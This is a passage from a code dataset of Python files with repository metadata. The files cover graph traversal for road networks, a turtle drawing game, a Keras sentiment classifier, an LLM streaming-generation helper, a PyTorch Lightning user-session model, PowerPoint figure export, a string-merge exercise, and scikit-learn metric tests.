if edge not in self._emanatingEdges:\n            raise GraphError(\"Link %s does not emanate from node %s\" %\n                             (edge.iid, self.id))\n\n        self._emanatingEdges.remove(edge)\n        self._sortEdges()\n\n    def _deleteInEdge(self, edge):\n\n        #raise Exception(\"Not implemented yet\")\n        assert isinstance(edge, Edge)\n\n        if edge not in self._incidentEdges:\n            raise GraphError(\"Edge %s is not incident to node %s\" %\n                             (edge.iid, self.id))\n        \n        self._incidentEdges.remove(edge)\n        self._sortEdges()\n        \n    def getCardinality(self):\n\n        return (self.getNumOutEdges(),\n                self.getNumInEdges())\n        \n    def getNumOutEdges(self):\n\n        return len(self._emanatingEdges)\n\n    def getNumInEdges(self):\n\n        return len(self._incidentEdges)\n\n    def getNumAdjacentEdges(self):\n        \n        return len(self._emanatingEdges) + len(self._incidentEdges)\n\n    def getNumAdjacentVertices(self):\n\n        return sum([1 for e in self.iterAdjacentVertices()])\n\n    def getNumPredecessorVertices(self):\n\n        return self.getNumInEdges()\n\n    def getNumSuccessorVertices(self):\n\n        return self.getNumOutEdges()\n    \n    def getOutEdgeClockwise(self, emanatingEdge):\n        \n        if self.getNumOutEdges() == 0:\n            raise GraphError(\"The vertex %s does not have any emanating edges associated with it\" %\n                             self.id)\n\n        if self.getNumOutEdges() == 1:\n            raise GraphError(\"The vertex %s has only one emanating edge associated with it\" %\n                             self.id)        \n        \n        index = self._emanatingEdges.index(emanatingEdge)\n        if index == len(self._emanatingEdges) - 1:\n            return self._emanatingEdges[0]\n        else:\n            return self._emanatingEdges[index + 1]\n\n    def getInEdgeClockwise(self, edge):\n\n        if self.getNumInEdges() == 0:\n            raise GraphError(\"The vertex %s does not have any incident edges associated with it\" %\n                             self.id)\n        \n        if self.getNumInEdges() == 1:\n            raise GraphError(\"The vertex %s has only one incident edge associated with it\" %\n                             self.id)\n\n        index = self._incidentEdges.index(edge)\n        if index == 0:\n            return self._incidentEdges[-1]\n        else:\n            return self._incidentEdges[index - 1]\n        \n    def getInEdgeCounterClockwise(self, edge):\n        \n        if self.getNumInEdges() == 0:\n            raise GraphError(\"The vertex %s does not have any incident edges associated with it\" %\n                             self.id)\n        \n        if self.getNumInEdges() == 1:\n            raise GraphError(\"The vertex %s has only one incident edge associated with it\" %\n                             self.id)\n        \n        index = self._incidentEdges.index(edge)\n        \n        if index == len(self._incidentEdges) - 1:\n            return self._incidentEdges[0]\n        else:\n            return self._incidentEdges[index + 1]\n        \n    def getEdgeClockwise(self, edge):\n        \"\"\"Get the closest edge either incident or emanating that is\n        the first edge to encounter if you are to start walking\n        clockwise from this edge\"\"\"\n        \n\n        # assign mate links to be the pairs of incident/emanating links \n        #that have a difference of angle that is less than 
5degrees\n\n #now if there is an incident or emanating link without a mate\n #then you should shift it to the left or right. \n \n #now every edge has the left and right edge based on the offset \n \n #how do pick the next link? you just pick the next link with \n #the smallest angle \n #so you need the angle between three points nodeA, self, nodeB\n\n #sort by angle\n #allEdges = sorted(chain(self._incidentEdges, self._emanatingEdges),\n # key = lambda e: self.getOrientation(e.midpoint2))\n\n allEdges = self._edgesClockwise \n index = allEdges.index(edge)\n if index != len(allEdges) - 1:\n return allEdges[index + 1]\n else:\n return allEdges[0]\n \n def getOutEdge(self, vertexId):\n \n for edge in self.iterOutEdges():\n if edge.endVertexId == vertexId:\n return edge\n \n raise GraphError(\"Vertex %s is not connected to vertex %s\" % (self.id ,vertexId))\n\n def getInEdge(self, vertexId):\n \n for edge in self.iterInEdges():\n if edge.startVertexId == vertexId:\n return edge \n raise GraphError(\"Vertex %s is not connected to vertex %s\" % (vertexId, self.id))\n\n def getMovement(self, upVertexId, downVertexId):\n \n iEdge = self.getInEdge(upVertexId)\n mov = iEdge.getOutMovement(downVertexId) \n return mov\n \n def getNumMovements(self):\n \"\"\"Return the number of permitted movements through the intersection\"\"\"\n return sum(imap(lambda mov:1, self.iterMovements()))\n \n def hasOutEdge(self, vertexId):\n\n return vertexId in [edge.endVertex.id for edge in self.iterOutEdges()]\n\n def hasInEdge(self, vertexId):\n\n return vertexId in [edge.startVertexId for edge in self.iterInEdges()]\n\n def hasMovement(self, upVertexId, downVertexId):\n \n for mov in self.iterMovements():\n if mov.startVertexId == upVertexId and mov.vertexCid == downVertexId:\n return True\n return False \n\n def iterMovements(self):\n\n return (mov for iEdge in self.iterInEdges() for mov in iEdge.iterOutMovements()) \n\n def iterEdgesClockwise(self):\n\n return iter(self._edgesClockwise)\n\n def iterEdgePairs(self):\n\n if self.getNumAdjacentEdges() < 2:\n raise GraphError(\"Number of adjacent edges is less than 2\") \n\n if self.getNumAdjacentEdges() == 2:\n yield self._edgesClockwise[0], self._edgesClockwise[1]\n raise StopIteration\n\n eIter = self.iterEdgesClockwise()\n edge1 = eIter.next()\n while True:\n try:\n edge2 = eIter.next() \n yield (edge1, edge2)\n edge1 = edge2 \n\n except StopIteration:\n yield self._edgesClockwise[-1], self._edgesClockwise[0] \n raise StopIteration \n \n def iterOutEdges(self):\n\n return iter(self._emanatingEdges)\n\n def iterInEdges(self):\n\n return iter(self._incidentEdges)\n\n def iterSuccVertices(self):\n\n for edge in self.iterOutEdges():\n yield edge.endVertex\n\n def iterPredVertices(self):\n\n for edge in self.iterInEdges():\n yield edge.startVertex\n\n def iterAdjacentVertices(self):\n \n av = set(self.iterSuccVertices())\n av = av.union(set(self.iterPredVertices()))\n return iter(av)\n \n def iterEdges(self):\n\n return chain(self.iterOutEdges(), self.iterInEdges())\n\n def isJunction(self):\n \n if self.getNumOutEdges() == 1 or self.getNumInEdges() == 1:\n return True\n return False\n\n def isShapePoint(self):\n\n if self.getNumAdjacentEdges() == 4 and self.getNumAdjacentVertices() == 2:\n return True\n if self.getNumAdjacentEdges() == 2 and self.getNumAdjacentVertices() == 2:\n return True\n return False\n\n def isIntersection(self):\n \n return not self.isJunction()\n\n def isIncoming(self, edge):\n\n return True if edge in self._incidentEdges else False\n\n def 
isOutgoing(self, edge):\n\n        return True if edge in self._emanatingEdges else False        \n    \n    def getOrientation(self, point):\n\n        x1 = self.x\n        y1 = self.y\n        x2 = point.x\n        y2 = point.y\n\n        if x2 > x1 and y2 <= y1: # 2nd quarter\n            orientation = atan(fabs(y2-y1)/fabs(x2-x1)) + pi/2\n        elif x2 <= x1 and y2 < y1: # 3rd quarter\n            orientation = atan(fabs(x2-x1)/fabs(y2-y1)) + pi\n        elif x2 < x1 and y2 >= y1: # 4th quarter \n            orientation = atan(fabs(y2-y1)/fabs(x2-x1)) + 3 * pi/2\n        elif x2 >= x1 and y2 > y1: # 1st quarter\n            orientation = atan(fabs(x2-x1)/fabs(y2-y1))\n        else:\n            orientation = 0.0\n\n        return orientation * 180.0 / pi\n\n    \n","repo_name":"michalis/pyDTATools","sub_path":"src/roadNetwork/roadNode.py","file_name":"roadNode.py","file_ext":"py","file_size_in_byte":11444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"25442192982","text":"# Day 19 - Etch a Sketch project\n\nfrom turtle import Turtle, Screen\n\ntim = Turtle()\nscreen = Screen()\nscreen.colormode(255)\ntim.shape('turtle')\ntim.fillcolor('RoyalBlue1')\ntim.pensize(5)\ntim.pencolor((160,32,240))\n\n\ndef move_forwards():\n    tim.forward(10)\n    \ndef move_backwards():\n    tim.backward(10)\n\ndef turn_right():\n    tim.right(10)\n    \ndef turn_left():\n    tim.left(10)\n    \ndef clear_drawing():\n    tim.clear()\n    tim.penup()\n    tim.home()\n    tim.pendown()\n\ntim.speed('fastest')\nscreen.listen()\nscreen.onkey(key=\"w\", fun=move_forwards)\nscreen.onkey(key=\"s\", fun=move_backwards)\nscreen.onkey(key=\"d\", fun=turn_right)\nscreen.onkey(key=\"a\", fun=turn_left)\nscreen.onkey(key=\"space\", fun=clear_drawing)\nscreen.exitonclick()","repo_name":"Amar1709/100Days_Python","sub_path":"Day_19/etch-a-sketch-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38319228359","text":"import tinyparse as m\nimport sys\n\nparser = m.ArgumentParser(\"Repeat a value.\", \"repeat\", sys.argv)\n\nincludeCounter = parser.Flag('include-counter', 'Include a counter with each repetition.')\ncount = parser.Option('count', 'The number of times to repeat a value.', int )\nphrase = parser.Argument('phrase', str, 'The value to repeat.')\n\nif __name__ == '__main__':\n    \n    if count:\n        repeatCounter = count\n    else:\n        repeatCounter = 5\n    \n    for i in range(0, repeatCounter): \n        if includeCounter:\n            print(f\"{i+1}: {phrase}\")\n        else:\n            print(phrase)","repo_name":"wdxpe/tinyparse","sub_path":"examples/repeat/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18469016338","text":"# -*- coding: utf-8 -*-\n# Date: 2021/04/19\n\n# Load the dataset from the Internet Movie Database (IMDB)\nfrom keras.datasets import imdb\nimport numpy as np\n\n(train_data, train_label), (test_data, test_label) = imdb.load_data(num_words=10000)\n\n# word_index is a dictionary mapping words to integer indices\nword_index = imdb.get_word_index()\n\n# Reverse the mapping so that integer indices map back to words\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\ndecoded_review = ''.join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])\n\n# Encode the integer sequences into a binary matrix\ndef vectorize_sequences(sequences, dimension=10000):\n    results = np.zeros((len(sequences), dimension))\n    # enumerate yields each index together with its corresponding value\n    for i, sequence in enumerate(sequences):\n        results[i, sequence] = 1.0\n    return results\n\n\n# Vectorize the training and test data\nx_train = vectorize_sequences(train_data)\nx_test = vectorize_sequences(test_data)\n# Vectorize the labels\ny_train = np.asarray(train_label).astype('float32')\ny_test = np.asarray(test_label).astype('float32')\n\n# Architecture choice: two intermediate layers with 16 hidden units each, using relu as the activation function.\n# The third layer outputs a scalar that predicts the sentiment of the current review.\n# The last layer uses a sigmoid activation to output a probability\n\n# Define the model\nfrom keras import models\nfrom keras import layers\n\nmodel = models.Sequential() # layers are stacked in order\nmodel.add(layers.Dense(16, activation='relu', input_shape=(10000,))) # Dense is a fully connected layer\nmodel.add(layers.Dense(16, activation='tanh'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\n# Configure the optimizer\nfrom keras import optimizers\nfrom keras import losses\nfrom keras import metrics\n\n# Compile the model (choose the optimizer and the loss function)\n# model.compile(optimizer='resprop',loss='binary_crossentropy',metrics=['accuracy'])\n# Custom optimizer, loss and metrics\nmodel.compile(optimizer=optimizers.RMSprop(lr=0.001), loss=losses.binary_crossentropy,\n              metrics=[metrics.binary_accuracy])\n\n# Hold out samples from the training set as a validation set\nx_val = x_train[:10000]\npartial_x_train = x_train[10000:]\ny_val = y_train[:10000]\npartial_y_train = y_train[10000:]\n# Train the model\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(partial_x_train, partial_y_train, epochs=20, batch_size=512, validation_data=(x_val, y_val))\n\nimport matplotlib.pyplot as plt\n\nhistory_dict = history.history\n# Validation loss and training loss\nloss_values = history_dict['loss']\nval_loss_values = history_dict['val_loss']\nepochs = range(1, len(loss_values) + 1)\n# Set the x-axis data, y-axis data, curve format and legend label\nplt.plot(epochs, loss_values, 'bo', label='Training loss')\nplt.plot(epochs, val_loss_values, 'b', label='Validation loss')\n# Set the title\nplt.title('Training and Validation loss')\n# Set the axis labels\nplt.xlabel('Epochs')\nplt.ylabel('loss')\n# Show the legend\nplt.legend()\nplt.show()\n\nacc = history_dict['acc']\nval_acc = history_dict['val_acc']\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n\n# Retrain the model from scratch\nmodel = models.Sequential()\nmodel.add(layers.Dense(16, activation='relu', input_shape=(10000,)))\nmodel.add(layers.Dense(16, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(x_train, y_train, epochs=4, batch_size=512)\n\n# Things to vary: 1. the number of hidden layers, 2. the number of hidden units, 3. use mse instead of binary_crossentropy, 4. use tanh instead of relu\n# Preprocess the raw data into tensors that can be fed into the neural network\n# For a binary classification problem with a scalar sigmoid output, use the binary_crossentropy loss function.\n# The rmsprop optimizer is usually a good choice\n# Overfitting makes the results on held-out data progressively worse\nresults = model.evaluate(x_test, y_test)\n","repo_name":"yang-12345678/Keras","sub_path":"01 二分类问题.py","file_name":"01 二分类问题.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15540262699","text":"import torch\nimport requests\nimport json\nimport datetime\nimport time\nimport os\n\nimport pdb\nimport re\nimport copy\nimport warnings\n\nfrom typing import Optional, List, Callable, Tuple\nfrom fastchat.model.model_chatglm import InvalidScoreLogitsProcessor\nfrom flask import Flask, request, jsonify, Response, stream_with_context\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '3,5'\n\nhost = '10.176.40.138'\nport = 23496\n\noverall_instruction = \"你是复旦大学知识工场实验室训练出来的语言模型CuteGPT。给定任务描述,请给出对应请求的回答。\\n\"\n\n# model_name = \"/mnt/data122/datasets/LLaMA/llama_13b_112_sft_v1_16bit\"\nmodel_name = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_13b_112_sft_v1\"\n# LORA_WEIGHTS = 
\"/data/heqianyu/big_model/instruction/ckp/bloom-alpaca-ch-10w_500\"\n# LORA_WEIGHTS = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_lora_623v1/llama_lora_623v1_epoch3\"\n# LORA_WEIGHTS = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_lora_615v1_epoch2\"\n\n\nimport torch.nn as nn\nfrom peft import PeftModel\n\nfrom transformers import AutoModelWithLMHead, AutoTokenizer, GenerationConfig, AutoModelForCausalLM, \\\n StoppingCriteriaList\nfrom transformers.generation.utils import LogitsProcessorList, logger\nfrom transformers.generation.logits_process import NoBadWordsLogitsProcessor\nfrom transformers import AutoModelWithLMHead, T5Tokenizer, AutoTokenizer, LlamaForCausalLM, LlamaTokenizer\n\n\n# chatglm-6bmodel/modeling_chatglm.py\n@torch.no_grad()\ndef stream_chat(self, tokenizer, query: str, history: List[Tuple[str, str]] = None, max_length: int = 2048,\n do_sample=True, top_p=0.7, temperature=0.95, logits_processor=None, **kwargs):\n if history is None:\n history = []\n if logits_processor is None:\n logits_processor = LogitsProcessorList()\n logits_processor.append(InvalidScoreLogitsProcessor())\n gen_kwargs = {\"max_length\": max_length, \"do_sample\": do_sample, \"top_p\": top_p,\n \"temperature\": temperature, \"logits_processor\": logits_processor, **kwargs}\n if not history:\n prompt = query\n else:\n prompt = \"\"\n for i, (old_query, response) in enumerate(history):\n prompt += \"[Round {}]\\n问:{}\\n答:{}\\n\".format(i, old_query, response)\n prompt += \"[Round {}]\\n问:{}\\n答:\".format(len(history), query)\n inputs = tokenizer([prompt], return_tensors=\"pt\")\n inputs = inputs.to(self.device)\n for outputs in self.stream_generate(**inputs, **gen_kwargs):\n outputs = outputs.tolist()[0][len(inputs[\"input_ids\"][0]):]\n response = tokenizer.decode(outputs)\n response = self.process_response(response)\n new_history = history + [(query, response)]\n yield response, new_history\n\n\n@torch.no_grad()\ndef stream_generate(\n self,\n input_ids,\n generation_config: Optional[GenerationConfig] = None,\n logits_processor: Optional[LogitsProcessorList] = None,\n stopping_criteria: Optional[StoppingCriteriaList] = None,\n prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None,\n **kwargs,\n):\n batch_size, input_ids_seq_length = input_ids.shape[0], input_ids.shape[-1]\n\n if generation_config is None:\n generation_config = self.generation_config\n generation_config = copy.deepcopy(generation_config)\n model_kwargs = generation_config.update(**kwargs)\n bos_token_id, eos_token_id = generation_config.bos_token_id, generation_config.eos_token_id\n\n if isinstance(eos_token_id, int):\n eos_token_id = [eos_token_id]\n\n has_default_max_length = kwargs.get(\"max_length\") is None and generation_config.max_length is not None\n if has_default_max_length and generation_config.max_new_tokens is None:\n warnings.warn(\n f\"Using `max_length`'s default ({generation_config.max_length}) to control the generation length. 
\"\n \"This behaviour is deprecated and will be removed from the config in v5 of Transformers -- we\"\n \" recommend using `max_new_tokens` to control the maximum length of the generation.\",\n UserWarning,\n )\n elif generation_config.max_new_tokens is not None:\n generation_config.max_length = generation_config.max_new_tokens + input_ids_seq_length\n if not has_default_max_length:\n logger.warn(\n f\"Both `max_new_tokens` (={generation_config.max_new_tokens}) and `max_length`(=\"\n f\"{generation_config.max_length}) seem to have been set. `max_new_tokens` will take precedence. \"\n \"Please refer to the documentation for more information. \"\n \"(https://huggingface.co/docs/transformers/main/en/main_classes/text_generation)\",\n UserWarning,\n )\n\n if input_ids_seq_length >= generation_config.max_length:\n input_ids_string = \"decoder_input_ids\" if self.config.is_encoder_decoder else \"input_ids\"\n logger.warning(\n f\"Input length of {input_ids_string} is {input_ids_seq_length}, but `max_length` is set to\"\n f\" {generation_config.max_length}. This can lead to unexpected behavior. You should consider\"\n \" increasing `max_new_tokens`.\"\n )\n\n # 2. Set generation parameters if not already defined\n logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList()\n stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList()\n\n logits_processor = self._get_logits_processor(\n generation_config=generation_config,\n input_ids_seq_length=input_ids_seq_length,\n encoder_input_ids=input_ids,\n prefix_allowed_tokens_fn=prefix_allowed_tokens_fn,\n logits_processor=logits_processor,\n )\n\n stopping_criteria = self._get_stopping_criteria(\n generation_config=generation_config, stopping_criteria=stopping_criteria\n )\n logits_warper = self._get_logits_warper(generation_config)\n\n unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1)\n scores = None\n while True:\n model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs)\n # forward pass to get next token\n outputs = self(\n **model_inputs,\n return_dict=True,\n output_attentions=False,\n output_hidden_states=False,\n )\n\n next_token_logits = outputs.logits[:, -1, :]\n\n # pre-process distribution\n next_token_scores = logits_processor(input_ids, next_token_logits)\n next_token_scores = logits_warper(input_ids, next_token_scores)\n\n # sample\n probs = nn.functional.softmax(next_token_scores, dim=-1)\n if generation_config.do_sample:\n next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1)\n else:\n next_tokens = torch.argmax(probs, dim=-1)\n\n # update generated ids, model inputs, and length for next step\n input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1)\n model_kwargs = self._update_model_kwargs_for_generation(\n outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder\n )\n unfinished_sequences = unfinished_sequences.mul((sum(next_tokens != i for i in eos_token_id)).long())\n\n # stop when each sentence is finished, or if we exceed the maximum length\n if unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores):\n break\n yield input_ids","repo_name":"Rhine-AI-Lab/KW-General","sub_path":"cutegpt-inference/test/stream_generate.py","file_name":"stream_generate.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39800119248","text":"import pytorch_lightning as pl\nimport 
torch\n\n\nclass SessionTrainer(pl.LightningModule):\n\n def __init__(self, dataset, n_users, n_events, test_dataset=None, embed_dim=128, batch_size=128, learning_rate=1e-2,\n padding_idx=0, session_size=10, hidden_dim=128, time_norm=False):\n super(SessionTrainer, self).__init__()\n self.dataset = dataset\n self.test_dataset = test_dataset if test_dataset is not None else dataset\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.session_size = session_size\n\n self.user_embed = torch.nn.Embedding(num_embeddings=n_users, embedding_dim=embed_dim, padding_idx=padding_idx,\n max_norm=1)\n self.event_embed = torch.nn.Embedding(num_embeddings=n_events, embedding_dim=embed_dim, padding_idx=padding_idx,\n max_norm=1)\n\n self.hidden_dim = hidden_dim\n self.time_dim = hidden_dim // 4\n self.time_norm = time_norm\n if time_norm:\n self.time_layers = torch.nn.ModuleList([\n torch.nn.Linear(self.time_dim, hidden_dim),\n torch.nn.Linear(hidden_dim, 1)\n ])\n\n def get_time_encoding(self, t, max_time=60 * 60):\n powers = max_time ** (2 / self.time_dim * torch.arange(self.time_dim // 2).type_as(t))\n invert_powers = 1 / powers\n x = torch.matmul(t.unsqueeze(-1), invert_powers.unsqueeze(0))\n x = torch.cat([torch.sin(x), torch.cos(x)], dim=-1)\n if self.time_dim % 2 == 1:\n x = torch.nn.functional.pad(x, pad=(0, 1), value=0)\n return x\n\n def build_context(self, events_embed, times=None):\n # get context vector from events b (1+neg) d\n if self.time_norm and times is not None:\n times_embed = self.get_time_encoding(times)\n weights = self.time_layers[1](torch.nn.functional.silu(self.time_layers[0](times_embed)))\n weights = torch.softmax(weights, dim=-2)\n return (weights * events_embed).sum(dim=-2)\n else:\n return torch.mean(events_embed, dim=-2)\n\n def pred(self, events, times=None):\n\n users_embed = self.user_embed(torch.arange(self.user_embed.num_embeddings).type_as(events)) # u d\n events_embed = self.build_context(self.event_embed(events), times) # b d\n\n preds = torch.softmax(torch.sum(users_embed.unsqueeze(0) * events_embed.unsqueeze(1), dim=-1), dim=-1)\n\n return preds # b u\n\n def forward(self, users, events, times=None):\n users_embed = self.user_embed(users) # b d\n events_embed = self.event_embed(events) # b (1+neg) t d\n events_embed = self.build_context(events_embed, times)\n # do scalar product of user (b 1 d) with session embed (b (1+neg) d)\n preds = torch.softmax(torch.sum(users_embed.unsqueeze(-2) * events_embed, dim=-1), dim=-1)\n\n return preds\n\n def step(self, batch):\n\n preds = self.forward(batch['users'], batch['events'], batch['times'])\n\n return {\n # in every batch zero user is a true class\n 'loss': torch.nn.functional.cross_entropy(preds, torch.zeros(len(preds)).type_as(batch['events'])),\n 'preds': preds\n }\n\n def training_step(self, batch, batch_idx):\n loss = self.step(batch)\n self.log(f'train_loss', loss['loss'], prog_bar=True, sync_dist=True)\n\n return loss['loss']\n\n def validation_step(self, batch, batch_idx):\n loss = self.step(batch)\n self.log(f'val_loss', loss['loss'], prog_bar=True, sync_dist=True)\n\n events = batch['events'][:, 0]\n times = batch['times'][:, 0]\n true_users = batch['users']\n\n preds = self.pred(events, times)\n pred_ids = torch.argmax(preds, dim=-1)\n\n accuracy = (true_users == pred_ids).float().mean()\n self.log(f'val_accuracy', accuracy, prog_bar=True, sync_dist=True)\n\n def configure_optimizers(self):\n params = list(self.user_embed.parameters()) + list(self.event_embed.parameters())\n if 
self.time_norm:\n params += list(self.time_layers.parameters())\n optimizer = torch.optim.SGD(lr=self.learning_rate, params=params)\n return optimizer\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=max((2 * torch.cuda.device_count(), 2)),\n pin_memory=False, prefetch_factor=1)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.test_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=max((2 * torch.cuda.device_count(), 2)),\n pin_memory=False, prefetch_factor=1)\n","repo_name":"sthfaceless/explore","sub_path":"modules/nlp/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12414875530","text":"from figpptx import transcribe, rasterize\nfrom figpptx import pptx_misc\nfrom figpptx import image_misc\nfrom figpptx import artist_misc\n\n\nclass Comparer:\n \"\"\"Compare the result of ``rasterize`` and ``transcribe``.\n Mainly, it is used for checking behaviors to\n develop ``converters`` for ``PPTXTranscriber``.\n \"\"\"\n\n def __init__(self, slide=None):\n self._slide = slide\n\n @property\n def slide(self):\n return pptx_misc.get_slide(self._slide)\n\n def compare(self, artist):\n \"\"\"Args:\"\"\"\n fig = artist_misc.to_figure(artist)\n fig.set_dpi(72)\n slide_size = pptx_misc.get_slide_size(self.slide)\n\n # To know the size of image proactively.\n image = image_misc.to_image(artist)\n left1, top1, left2, top2 = _decide_positions(slide_size, image.size)\n\n rasterize(artist, slide=self.slide, left=left1, top=top1)\n transcribe(artist, slide=self.slide, left=left2, top=top2)\n\n\ndef _decide_positions(slide_size, image_size):\n slide_width, slide_height = slide_size\n image_width, image_height = image_size\n width_margin = (slide_width / 2 - image_width) / 2\n height_margin = (slide_height - image_height) / 2\n width_margin = max(0, width_margin)\n height_margin = max(0, height_margin)\n\n left1, top1 = width_margin, height_margin\n left2, top2 = slide_width / 2 + width_margin, height_margin\n return left1, top1, left2, top2\n","repo_name":"Sillte/figpptx","sub_path":"figpptx/comparer.py","file_name":"comparer.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9656587031","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n min_len = min(len(word1), len(word2))\n\n buildup = ''\n for i in range(min_len):\n buildup += word1[i]\n buildup += word2[i]\n \n if len(word1) < len(word2):\n buildup += word2[min_len:] \n else:\n buildup += word1[min_len:] \n return buildup","repo_name":"cphung3/leetcode-solutions","sub_path":"Interview 150/Array - String/1768. Merge Strings Alternately.py","file_name":"1768. Merge Strings Alternately.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1869378729","text":"import random\nimport numpy as np\n\nfrom nose.tools import raises\nfrom nose.tools import assert_true, assert_raises\nfrom numpy.testing import assert_array_almost_equal\nfrom numpy.testing import assert_array_equal\nfrom numpy.testing import assert_equal, assert_almost_equal\n\nfrom ... import datasets\nfrom ... 
import svm\nfrom ..metrics import auc\nfrom ..metrics import classification_report\nfrom ..metrics import confusion_matrix\nfrom ..metrics import explained_variance_score\nfrom ..metrics import r2_score\nfrom ..metrics import f1_score\nfrom ..metrics import matthews_corrcoef\nfrom ..metrics import mean_squared_error\nfrom ..metrics import precision_recall_curve\nfrom ..metrics import precision_recall_fscore_support\nfrom ..metrics import precision_score\nfrom ..metrics import recall_score\nfrom ..metrics import roc_curve\nfrom ..metrics import auc_score\nfrom ..metrics import average_precision_score\nfrom ..metrics import zero_one\nfrom ..metrics import hinge_loss\n\n\ndef make_prediction(dataset=None, binary=False):\n \"\"\"Make some classification predictions on a toy dataset using a SVC\n\n If binary is True restrict to a binary classification problem instead of a\n multiclass classification problem\n \"\"\"\n\n if dataset is None:\n # import some data to play with\n dataset = datasets.load_iris()\n\n X = dataset.data\n y = dataset.target\n\n if binary:\n # restrict to a binary classification task\n X, y = X[y < 2], y[y < 2]\n\n n_samples, n_features = X.shape\n p = range(n_samples)\n\n random.seed(0)\n random.shuffle(p)\n X, y = X[p], y[p]\n half = int(n_samples / 2)\n\n # add noisy features to make the problem harder and avoid perfect results\n rng = np.random.RandomState(0)\n X = np.c_[X, rng.randn(n_samples, 200 * n_features)]\n\n # run classifier, get class probabilities and label predictions\n clf = svm.SVC(kernel='linear', probability=True)\n probas_pred = clf.fit(X[:half], y[:half]).predict_proba(X[half:])\n\n if binary:\n # only interested in probabilities of the positive case\n # XXX: do we really want a special API for the binary case?\n probas_pred = probas_pred[:, 1]\n\n y_pred = clf.predict(X[half:])\n y_true = y[half:]\n return y_true, y_pred, probas_pred\n\n\ndef test_roc_curve():\n \"\"\"Test Area under Receiver Operating Characteristic (ROC) curve\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.80, decimal=2)\n assert_almost_equal(roc_auc, auc_score(y_true, probas_pred))\n\n\ndef test_roc_returns_consistency():\n \"\"\"Test whether the returned threshold matches up with tpr\"\"\"\n # make small toy dataset\n y_true, _, probas_pred = make_prediction(binary=True)\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n\n # use the given thresholds to determine the tpr\n tpr_correct = []\n for t in range(len(thresholds)):\n tp = np.sum((probas_pred >= thresholds[t]) & y_true)\n p = np.sum(y_true)\n tpr_correct.append(1.0 * tp / p)\n\n # compare tpr and tpr_correct to see if the thresholds' order was correct\n assert_array_almost_equal(tpr, tpr_correct, decimal=2)\n\n\n@raises(ValueError)\ndef test_roc_curve_multi():\n \"\"\"roc_curve not applicable for multi-class problems\"\"\"\n y_true, _, probas_pred = make_prediction(binary=False)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n\n\ndef test_roc_curve_confidence():\n \"\"\"roc_curve for confidence scores\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred - 0.5)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.80, decimal=2)\n\n\ndef test_roc_curve_hard():\n \"\"\"roc_curve for hard decisions\"\"\"\n y_true, pred, probas_pred = make_prediction(binary=True)\n\n # always predict one\n 
